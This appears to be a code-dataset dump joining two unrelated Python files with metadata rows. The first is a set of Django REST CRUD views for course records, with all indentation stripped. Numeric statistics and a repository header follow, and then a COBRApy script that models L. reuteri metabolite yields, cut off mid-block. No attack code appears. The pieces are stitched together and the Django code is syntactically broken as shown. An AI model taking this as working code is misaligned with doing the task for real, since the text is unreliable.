def get(self, request, CourseID=None):
if CourseID:
try:
queryset = Info.objects.filter(CourseID=CourseID)
except Info.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
read_serializer = InfoSerializer(queryset, many=True)
else:
queryset = Info.objects.all()
read_serializer = InfoSerializer(queryset, many=True)
return Response(read_serializer.data)
def post(self, request):
create_serializer = InfoSerializer(data=request.data)
if create_serializer.is_valid():
item_object = create_serializer.save()
read_serializer = InfoSerializer(item_object)
return Response(read_serializer.data, status=201)
return Response(create_serializer.errors, status=400)
class InfoPutDelView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def put(self, request, ModelID=None):
try:
item = Info.objects.get(ModelID=ModelID)
except Info.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
update_serializer = InfoSerializer(item, data=request.data)
if update_serializer.is_valid():
item_object = update_serializer.save()
read_serializer = InfoSerializer(item_object)
return Response(read_serializer.data, status=200)
return Response(update_serializer.errors, status=400)
def delete(self, request, ModelID=None):
try:
item = Info.objects.get(ModelID=ModelID)
except Info.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
item.delete()
return Response(status=204)
class GradeDeterminationPostGetView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def get(self, request, CourseID=None):
if CourseID:
try:
queryset = GradeDetermination.objects.filter(CourseID=CourseID)
except GradeDetermination.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
read_serializer = GradeDeterminationSerializer(queryset, many=True)
else:
queryset = GradeDetermination.objects.all()
read_serializer = GradeDeterminationSerializer(queryset, many=True)
return Response(read_serializer.data)
def post(self, request):
create_serializer = GradeDeterminationSerializer(data=request.data)
if create_serializer.is_valid():
item_object = create_serializer.save()
read_serializer = GradeDeterminationSerializer(item_object)
return Response(read_serializer.data, status=201)
return Response(create_serializer.errors, status=400)
class GradeDeterminationPutDelView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def put(self, request, ModelID=None):
try:
item = GradeDetermination.objects.get(ModelID=ModelID)
except GradeDetermination.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
update_serializer = GradeDeterminationSerializer(item, data=request.data)
if update_serializer.is_valid():
item_object = update_serializer.save()
read_serializer = GradeDeterminationSerializer(item_object)
return Response(read_serializer.data, status=200)
return Response(update_serializer.errors, status=400)
def delete(self, request, ModelID=None):
try:
item = GradeDetermination.objects.get(ModelID=ModelID)
except GradeDetermination.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
item.delete()
return Response(status=204)
class OutcomePostGetView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def get(self, request, CourseID=None):
if CourseID:
try:
queryset = Outcome.objects.filter(CourseID=CourseID)
except Outcome.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
read_serializer = OutcomeSerializer(queryset, many=True)
else:
queryset = Outcome.objects.all()
read_serializer = OutcomeSerializer(queryset, many=True)
return Response(read_serializer.data)
def post(self, request):
create_serializer = OutcomeSerializer(data=request.data)
if create_serializer.is_valid():
item_object = create_serializer.save()
read_serializer = OutcomeSerializer(item_object)
return Response(read_serializer.data, status=201)
return Response(create_serializer.errors, status=400)
class OutcomePutDelView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def put(self, request, ModelID=None):
try:
item = Outcome.objects.get(ModelID=ModelID)
except Outcome.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
update_serializer = OutcomeSerializer(item, data=request.data)
if update_serializer.is_valid():
item_object = update_serializer.save()
read_serializer = OutcomeSerializer(item_object)
return Response(read_serializer.data, status=200)
return Response(update_serializer.errors, status=400)
def delete(self, request, ModelID=None):
try:
item = Outcome.objects.get(ModelID=ModelID)
except Outcome.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
item.delete()
return Response(status=204)
class TimetablePostGetView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def get(self, request, CourseID=None):
if CourseID:
try:
queryset = Timetable.objects.filter(CourseID=CourseID)
except Timetable.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
read_serializer = TimetableSerializer(queryset, many=True)
else:
queryset = Timetable.objects.all()
read_serializer = TimetableSerializer(queryset, many=True)
return Response(read_serializer.data)
def post(self, request):
create_serializer = TimetableSerializer(data=request.data)
if create_serializer.is_valid():
item_object = create_serializer.save()
read_serializer = TimetableSerializer(item_object)
return Response(read_serializer.data, status=201)
return Response(create_serializer.errors, status=400)
class TimetablePutDelView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def put(self, request, ModelID=None):
try:
item = Timetable.objects.get(ModelID=ModelID)
except Timetable.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
update_serializer = TimetableSerializer(item, data=request.data)
if update_serializer.is_valid():
item_object = update_serializer.save()
read_serializer = TimetableSerializer(item_object)
return Response(read_serializer.data, status=200)
return Response(update_serializer.errors, status=400)
def delete(self, request, ModelID=None):
try:
item = Timetable.objects.get(ModelID=ModelID)
except Timetable.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
item.delete()
return Response(status=204)
class GradeDistributionPostGetView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def get(self, request, CourseID=None):
if CourseID:
try:
queryset = GradeDistribution.objects.filter(CourseID=CourseID)
except GradeDistribution.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
read_serializer = GradeDistributionSerializer(queryset, many=True)
else:
queryset = GradeDistribution.objects.all()
read_serializer = GradeDistributionSerializer(queryset, many=True)
return Response(read_serializer.data)
def post(self, request):
create_serializer = GradeDistributionSerializer(data=request.data)
if create_serializer.is_valid():
item_object = create_serializer.save()
read_serializer = GradeDistributionSerializer(item_object)
return Response(read_serializer.data, status=201)
return Response(create_serializer.errors, status=400)
class GradeDistributionPutDelView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def put(self, request, ModelID=None):
try:
item = GradeDistribution.objects.get(ModelID=ModelID)
except GradeDistribution.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
update_serializer = GradeDistributionSerializer(item, data=request.data)
if update_serializer.is_valid():
item_object = update_serializer.save()
read_serializer = GradeDistributionSerializer(item_object)
return Response(read_serializer.data, status=200)
return Response(update_serializer.errors, status=400)
def delete(self, request, ModelID=None):
try:
item = GradeDistribution.objects.get(ModelID=ModelID)
except GradeDistribution.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
item.delete()
return Response(status=204)
class LecturePostGetView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def get(self, request, CourseID=None):
if CourseID:
try:
queryset = Lecture.objects.filter(CourseID=CourseID)
except Lecture.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
read_serializer = LectureSerializer(queryset, many=True)
else:
queryset = Lecture.objects.all()
read_serializer = LectureSerializer(queryset, many=True)
return Response(read_serializer.data)
def post(self, request):
create_serializer = LectureSerializer(data=request.data)
if create_serializer.is_valid():
item_object = create_serializer.save()
read_serializer = LectureSerializer(item_object)
return Response(read_serializer.data, status=201)
return Response(create_serializer.errors, status=400)
class LecturePutDelView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def put(self, request, ModelID=None):
try:
item = Lecture.objects.get(ModelID=ModelID)
except Lecture.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
update_serializer = LectureSerializer(item, data=request.data)
if update_serializer.is_valid():
item_object = update_serializer.save()
read_serializer = LectureSerializer(item_object)
return Response(read_serializer.data, status=200)
return Response(update_serializer.errors, status=400)
def delete(self, request, ModelID=None):
try:
item = Lecture.objects.get(ModelID=ModelID)
except Lecture.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
item.delete()
return Response(status=204)
class TutorialPostGetView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def get(self, request, CourseID=None):
if CourseID:
try:
queryset = Tutorial.objects.filter(CourseID=CourseID)
except Tutorial.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
read_serializer = TutorialSerializer(queryset, many=True)
else:
queryset = Tutorial.objects.all()
read_serializer = TutorialSerializer(queryset, many=True)
return Response(read_serializer.data)
def post(self, request):
create_serializer = TutorialSerializer(data=request.data)
if create_serializer.is_valid():
item_object = create_serializer.save()
read_serializer = TutorialSerializer(item_object)
return Response(read_serializer.data, status=201)
return Response(create_serializer.errors, status=400)
class TutorialPutDelView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def put(self, request, ModelID=None):
try:
item = Tutorial.objects.get(ModelID=ModelID)
except Tutorial.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
update_serializer = TutorialSerializer(item, data=request.data)
if update_serializer.is_valid():
item_object = update_serializer.save()
read_serializer = TutorialSerializer(item_object)
return Response(read_serializer.data, status=200)
return Response(update_serializer.errors, status=400)
def delete(self, request, ModelID=None):
try:
item = Tutorial.objects.get(ModelID=ModelID)
except Tutorial.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
item.delete()
return Response(status=204)
class CoursePostGetView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def get(self, request, CourseID=None):
if CourseID:
try:
queryset = Course.objects.filter(CourseID=CourseID)
except Course.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
read_serializer = CourseSerializer(queryset, many=True)
else:
queryset = Course.objects.all()
read_serializer = CourseSerializer(queryset, many=True)
return Response(read_serializer.data)
def post(self, request):
create_serializer = CourseSerializer(data=request.data)
if create_serializer.is_valid():
item_object = create_serializer.save()
read_serializer = CourseSerializer(item_object)
return Response(read_serializer.data, status=201)
return Response(create_serializer.errors, status=400)
class CoursePutDelView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def put(self, request, ModelID=None):
try:
item = Course.objects.get(ModelID=ModelID)
except Course.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
update_serializer = CourseSerializer(item, data=request.data)
if update_serializer.is_valid():
item_object = update_serializer.save()
read_serializer = CourseSerializer(item_object)
return Response(read_serializer.data, status=200)
return Response(update_serializer.errors, status=400)
def delete(self, request, ModelID=None):
try:
item = Course.objects.get(ModelID=ModelID)
except Course.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
item.delete()
return Response(status=204)
class TextbookPostGetView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def get(self, request, CourseID=None):
if CourseID:
try:
queryset = Textbook.objects.filter(CourseID=CourseID)
except Textbook.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
read_serializer = TextbookSerializer(queryset, many=True)
else:
queryset = Textbook.objects.all()
read_serializer = TextbookSerializer(queryset, many=True)
return Response(read_serializer.data)
def post(self, request):
create_serializer = TextbookSerializer(data=request.data)
if create_serializer.is_valid():
item_object = create_serializer.save()
read_serializer = TextbookSerializer(item_object)
return Response(read_serializer.data, status=201)
return Response(create_serializer.errors, status=400)
class TextbookPutDelView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def put(self, request, ModelID=None):
try:
item = Textbook.objects.get(ModelID=ModelID)
except Textbook.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
update_serializer = TextbookSerializer(item, data=request.data)
if update_serializer.is_valid():
item_object = update_serializer.save()
read_serializer = TextbookSerializer(item_object)
return Response(read_serializer.data, status=200)
return Response(update_serializer.errors, status=400)
def delete(self, request, ModelID=None):
try:
item = Textbook.objects.get(ModelID=ModelID)
except Textbook.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
item.delete()
return Response(status=204)
class AuWeightPostGetView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def get(self, request, CourseID=None):
if CourseID:
try:
queryset = AuWeight.objects.filter(CourseID=CourseID)
except AuWeight.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
read_serializer = AuWeightSerializer(queryset, many=True)
else:
queryset = AuWeight.objects.all()
read_serializer = AuWeightSerializer(queryset, many=True)
return Response(read_serializer.data)
def post(self, request):
create_serializer = AuWeightSerializer(data=request.data)
if create_serializer.is_valid():
item_object = create_serializer.save()
read_serializer = AuWeightSerializer(item_object)
return Response(read_serializer.data, status=201)
return Response(create_serializer.errors, status=400)
class AuWeightPutDelView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def put(self, request, ModelID=None):
try:
item = AuWeight.objects.get(ModelID=ModelID)
except AuWeight.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
update_serializer = AuWeightSerializer(item, data=request.data)
if update_serializer.is_valid():
item_object = update_serializer.save()
read_serializer = AuWeightSerializer(item_object)
return Response(read_serializer.data, status=200)
return Response(update_serializer.errors, status=400)
def delete(self, request, ModelID=None):
try:
item = AuWeight.objects.get(ModelID=ModelID)
except AuWeight.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
item.delete()
return Response(status=204)
class ContentCategoryPostGetView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def get(self, request, CourseID=None):
if CourseID:
try:
queryset = ContentCategory.objects.filter(CourseID=CourseID)
except ContentCategory.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
read_serializer = ContentCategorySerializer(queryset, many=True)
else:
queryset = ContentCategory.objects.all()
read_serializer = ContentCategorySerializer(queryset, many=True)
return Response(read_serializer.data)
def post(self, request):
create_serializer = ContentCategorySerializer(data=request.data)
if create_serializer.is_valid():
item_object = create_serializer.save()
read_serializer = ContentCategorySerializer(item_object)
return Response(read_serializer.data, status=201)
return Response(create_serializer.errors, status=400)
class ContentCategoryPutDelView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def put(self, request, ModelID=None):
try:
item = ContentCategory.objects.get(ModelID=ModelID)
except ContentCategory.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
update_serializer = ContentCategorySerializer(item, data=request.data)
if update_serializer.is_valid():
item_object = update_serializer.save()
read_serializer = ContentCategorySerializer(item_object)
return Response(read_serializer.data, status=200)
return Response(update_serializer.errors, status=400)
def delete(self, request, ModelID=None):
try:
item = ContentCategory.objects.get(ModelID=ModelID)
except ContentCategory.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
item.delete()
return Response(status=204)
class LabPostGetView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def get(self, request, CourseID=None):
if CourseID:
try:
queryset = Lab.objects.filter(CourseID=CourseID)
except Lab.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
read_serializer = LabSerializer(queryset, many=True)
else:
queryset = Lab.objects.all()
read_serializer = LabSerializer(queryset, many=True)
return Response(read_serializer.data)
def post(self, request):
create_serializer = LabSerializer(data=request.data)
if create_serializer.is_valid():
item_object = create_serializer.save()
read_serializer = LabSerializer(item_object)
return Response(read_serializer.data, status=201)
return Response(create_serializer.errors, status=400)
class LabPutDelView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def put(self, request, ModelID=None):
try:
item = Lab.objects.get(ModelID=ModelID)
except Lab.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
update_serializer = LabSerializer(item, data=request.data)
if update_serializer.is_valid():
item_object = update_serializer.save()
read_serializer = LabSerializer(item_object)
return Response(read_serializer.data, status=200)
return Response(update_serializer.errors, status=400)
def delete(self, request, ModelID=None):
try:
item = Lab.objects.get(ModelID=ModelID)
except Lab.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
item.delete()
return Response(status=204)
class SectionPostGetView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def get(self, request, CourseID=None):
if CourseID:
try:
queryset = Section.objects.filter(CourseID=CourseID)
except Section.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
read_serializer = SectionSerializer(queryset, many=True)
else:
queryset = Section.objects.all()
read_serializer = SectionSerializer(queryset, many=True)
return Response(read_serializer.data)
def post(self, request):
create_serializer = SectionSerializer(data=request.data)
if create_serializer.is_valid():
item_object = create_serializer.save()
read_serializer = SectionSerializer(item_object)
return Response(read_serializer.data, status=201)
return Response(create_serializer.errors, status=400)
class SectionPutDelView(
APIView,
UpdateModelMixin,
DestroyModelMixin,
):
def put(self, request, ModelID=None):
try:
item = Section.objects.get(ModelID=ModelID)
except Section.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
update_serializer = SectionSerializer(item, data=request.data)
if update_serializer.is_valid():
item_object = update_serializer.save()
read_serializer = SectionSerializer(item_object)
return Response(read_serializer.data, status=200)
return Response(update_serializer.errors, status=400)
def delete(self, request, ModelID=None):
try:
item = Section.objects.get(ModelID=ModelID)
except Section.DoesNotExist:
return Response({'errors': 'This item does not exist.'}, status=400)
item.delete()
return Response(status=204)
| 37.65088
| 84
| 0.657777
| 2,736
| 27,824
| 6.580775
| 0.042398
| 0.097973
| 0.06065
| 0.074646
| 0.905026
| 0.873146
| 0.82005
| 0.82005
| 0.82005
| 0.82005
| 0
| 0.016172
| 0.253271
| 27,824
| 738
| 85
| 37.701897
| 0.850412
| 0.000827
| 0
| 0.861538
| 0
| 0
| 0.046836
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086154
| false
| 0
| 0.009231
| 0
| 0.332308
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
06591a81f57be649455ef644c818b2583e2c7726
| 21,984
|
py
|
Python
|
ComplementaryScripts/Step_03_Compare_Refine/Step_refine_pipeline_part02_pathways.py
|
HaoLuoChalmers/Lactobacillus_reuteri_MM41A_GEM
|
9be6a48e7467e0c81b0b974180860d599fc9c201
|
[
"CC-BY-4.0"
] | null | null | null |
ComplementaryScripts/Step_03_Compare_Refine/Step_refine_pipeline_part02_pathways.py
|
HaoLuoChalmers/Lactobacillus_reuteri_MM41A_GEM
|
9be6a48e7467e0c81b0b974180860d599fc9c201
|
[
"CC-BY-4.0"
] | 1
|
2021-07-19T16:00:03.000Z
|
2021-07-19T16:00:03.000Z
|
ComplementaryScripts/Step_03_Compare_Refine/Step_refine_pipeline_part02_pathways.py
|
SysBioChalmers/Lactobacillus_reuteri_MM41A_GEM
|
9be6a48e7467e0c81b0b974180860d599fc9c201
|
[
"CC-BY-4.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Created by Hao Luo at 4/22/20
"""Step_refine_pipeline_part03_amino_acids.py
:description : script to refine important metabolites
:param : metabolites list: [lac acet etoh 1,3-propanediol,reuterin,hista_HISDC]
:returns:
:rtype:
"""
import os
import cobra
import My_def
os.chdir('../../ComplementaryData/Step_03_Compare_Refine/')
# %%
Lreu_draft_3_refined = cobra.io.load_json_model('Lreu_draft_3_refined_part01.json')
Lreu_draft_3_refined.id = 'Lreu_draft_3_refined'
Lreuteri_530 = cobra.io.load_json_model('../Step_02_DraftModels/Template/template_models/Lreuteri_530_standlized.json')
iNF517 = cobra.io.load_json_model('../Step_02_DraftModels/Template/template_models/iNF517_standlized.json')
iML1515 = cobra.io.load_json_model('../Step_02_DraftModels/Template/template_models/iML1515_standlized.json')
iML1515.reactions.get_by_id('EX_glc__D_e').bounds = (-25, 1000)
# %% <lac: >
met_i = Lreu_draft_3_refined.metabolites.get_by_id('lac__L_e')
print('\n', met_i.id, met_i.name, met_i.formula, met_i.annotation)
Lreu_draft_3_refined.reactions.get_by_id('EX_lac__L_e').bounds = (0, 1000)
objective_rea = 'EX_lac__L_e'
Lreu_draft_3_refined.objective = objective_rea
print('Lreu opt value: ', Lreu_draft_3_refined.optimize().objective_value)
# experiment data: Y LACt/GLU = 0.469 0.682 0.076
for model_i in [Lreu_draft_3_refined, Lreuteri_530, iML1515, ]: # iNF517
model = model_i.copy()
model.reactions.get_by_id('EX_glc__D_e').bounds = (-25, 1000)
model.reactions.get_by_id(objective_rea).bounds = (0, 1000)
model.reactions.get_by_id('ATPM').bounds = (0, 1000)
model.reactions.get_by_id('PFK').bounds = (0, 1000) # NOTE: Lreuteri_530 is(-1000,2)
try:
# close other carbon:
model.reactions.get_by_id('EX_cys__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_gly_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ala__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_leu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ile__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_thr__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_arg__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_asn__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_asp__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_glu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_glu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_glu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ser__L_e').bounds = (0, 1000)
# other limations:
model.reactions.get_by_id('EX_etoh_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_lac__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_lac__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_o2_e').bounds = (0, 1000)
except:
pass
model.objective = objective_rea
solution = model.optimize()
print(model.id, solution.objective_value)
obj_value = solution.objective_value
Y_g_g = obj_value * model.metabolites.get_by_id('lac__L_c').formula_weight \
/ (25 * model.metabolites.get_by_id('glc__D_e').formula_weight)
Y_c = obj_value * 3 / (25 * 6)
print('Y_g_g: ', Y_g_g, 'T_c: ', Y_c)
solution = cobra.flux_analysis.pfba(model) # model.optimize()
My_def.io_file.solution2txt(solution, model, model.id + '_temp_flux.txt')
# %% <acet:> TODO:
met_i = Lreu_draft_3_refined.metabolites.get_by_id('ac_e')
print('\n', met_i.id, met_i.name, met_i.formula, met_i.annotation)
Lreu_draft_3_refined.reactions.get_by_id('EX_ac_e').bounds = (0, 1000)
Lreu_draft_3_refined.add_reaction(iML1515.reactions.get_by_id('SADT2'))
Lreu_draft_3_refined.add_reaction(iML1515.reactions.get_by_id('ADSK'))
Lreu_draft_3_refined.add_reaction(iML1515.reactions.get_by_id('PAPSR'))
Lreu_draft_3_refined.add_reaction(iML1515.reactions.get_by_id('BPNT'))
objective_rea = 'EX_ac_e' # 'EX_co2_e'#'EX_for_e'##,
Lreu_draft_3_refined.objective = objective_rea
print('Lreu opt value: ', Lreu_draft_3_refined.optimize().objective_value)
# experiment data: Y ac/GLU = 0.2170-0.33
for model_i in [Lreu_draft_3_refined, Lreuteri_530, iML1515, ]: # iNF517
model = model_i.copy()
model.reactions.get_by_id('EX_glc__D_e').bounds = (-25, 1000)
model.reactions.get_by_id(objective_rea).bounds = (0, 1000)
model.reactions.get_by_id('ATPM').bounds = (0, 1000)
model.reactions.get_by_id('PFK').bounds = (0, 1000) # NOTE: Lreuteri_530 is(-1000,2)
try:
# other carbon:
model.reactions.get_by_id('EX_cys__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_gly_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ala__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_leu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ile__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_thr__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_arg__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_asn__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_asp__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_glu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_glu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_glu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ser__L_e').bounds = (0, 1000)
# other limations:
model.reactions.get_by_id('EX_for_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_etoh_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_lac__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_lac__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_o2_e').bounds = (0, 1000)
except:
pass
# rea = cobra.Reaction('NADHM')
# model.add_reaction(rea)
# model.reactions.get_by_id('NADHM').reaction = 'nadh_c + h_c --> nad_c'
# model.objective = 'NADHM'
model.objective = objective_rea
solution = model.optimize()
print(model.id, solution.objective_value)
obj_value = solution.objective_value
Y_g_g = obj_value * model.metabolites.get_by_id('ac_e').formula_weight \
/ (25 * model.metabolites.get_by_id('glc__D_e').formula_weight)
Y_c = obj_value * 2 / (25 * 6)
print('Y_g_g: ', Y_g_g, 'T_c: ', Y_c)
solution = cobra.flux_analysis.pfba(model) # model.optimize()
My_def.io_file.solution2txt(solution, model, model.id + '_temp_flux.txt')
# %% <etoh:>
met_i = Lreu_draft_3_refined.metabolites.get_by_id('etoh_e')
print('\n', met_i.id, met_i.name, met_i.formula, met_i.annotation)
Lreu_draft_3_refined.reactions.get_by_id('EX_etoh_e').bounds = (0, 1000)
objective_rea = 'EX_etoh_e'
Lreu_draft_3_refined.objective = objective_rea
print('Lreu opt value: ', Lreu_draft_3_refined.optimize().objective_value)
# experiment data: Y ac/GLU = 0.2170-0.33
for model_i in [Lreu_draft_3_refined, Lreuteri_530, iML1515, ]: # iNF517
model = model_i.copy()
model.reactions.get_by_id('EX_glc__D_e').bounds = (-25, 1000)
model.reactions.get_by_id(objective_rea).bounds = (0, 1000)
model.reactions.get_by_id('ATPM').bounds = (0, 1000)
model.reactions.get_by_id('PFK').bounds = (0, 1000) # NOTE: Lreuteri_530 is(-1000,2)
try:
# other carbon:
model.reactions.get_by_id('EX_cys__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_gly_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ala__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_leu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ile__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_thr__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_arg__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_asn__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_asp__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_glu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_glu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_glu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ser__L_e').bounds = (0, 1000)
# other limations:
model.reactions.get_by_id('EX_etoh_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_lac__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_lac__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_o2_e').bounds = (0, 1000)
except:
pass
# rea = cobra.Reaction('NADHM')
# model.add_reaction(rea)
# model.reactions.get_by_id('NADHM').reaction = 'nadh_c + h_c --> nad_c'
# model.objective = 'NADHM'
model.objective = objective_rea
solution = model.optimize()
print(model.id, solution.objective_value)
obj_value = solution.objective_value
Y_g_g = obj_value * model.metabolites.get_by_id('etoh_e').formula_weight \
/ (25 * model.metabolites.get_by_id('glc__D_e').formula_weight)
Y_c = obj_value * 2 / (25 * 6)
print('Y_g_g: ', Y_g_g, 'T_c: ', Y_c)
solution = cobra.flux_analysis.pfba(model) # model.optimize()
My_def.io_file.solution2txt(solution, model, model.id + '_temp_flux.txt')
# %%<1-propanol: ppoh> TODO:
met_i = Lreu_draft_3_refined.metabolites.get_by_id('ppoh_c')
print('\n', met_i.id, met_i.name, met_i.formula, met_i.annotation)
Lreu_draft_3_refined.add_reaction(iML1515.reactions.get_by_id('MGSA'))
Lreu_draft_3_refined.add_reaction(Lreuteri_530.reactions.get_by_id('PPOHt'))
Lreu_draft_3_refined.add_reaction(Lreuteri_530.reactions.get_by_id('EX_ppoh_e'))
Lreu_draft_3_refined.reactions.get_by_id('EX_ppoh_e').bounds = (0, 1000)
objective_rea = 'EX_ppoh_e'
Lreu_draft_3_refined.objective = objective_rea
print('Lreu opt value: ', Lreu_draft_3_refined.optimize().objective_value)
# experiment data: Y ac/GLU = 0.2170-0.33
for model_i in [Lreu_draft_3_refined, Lreuteri_530, ]: # iNF517iML1515,
model = model_i.copy()
model.reactions.get_by_id('EX_glc__D_e').bounds = (-25, 1000)
# model.reactions.get_by_id('EX_glyc_e').bounds = (-10, 1000)
model.reactions.get_by_id(objective_rea).bounds = (0, 1000)
model.reactions.get_by_id('ATPM').bounds = (0, 1000)
model.reactions.get_by_id('PFK').bounds = (0, 1000) # NOTE: Lreuteri_530 is(-1000,2)
try:
# other carbon:
model.reactions.get_by_id('EX_cys__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_gly_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ala__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_leu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ile__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_thr__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_arg__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_asn__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_asp__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_glu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_glu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_glu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ser__L_e').bounds = (0, 1000)
# other limations:
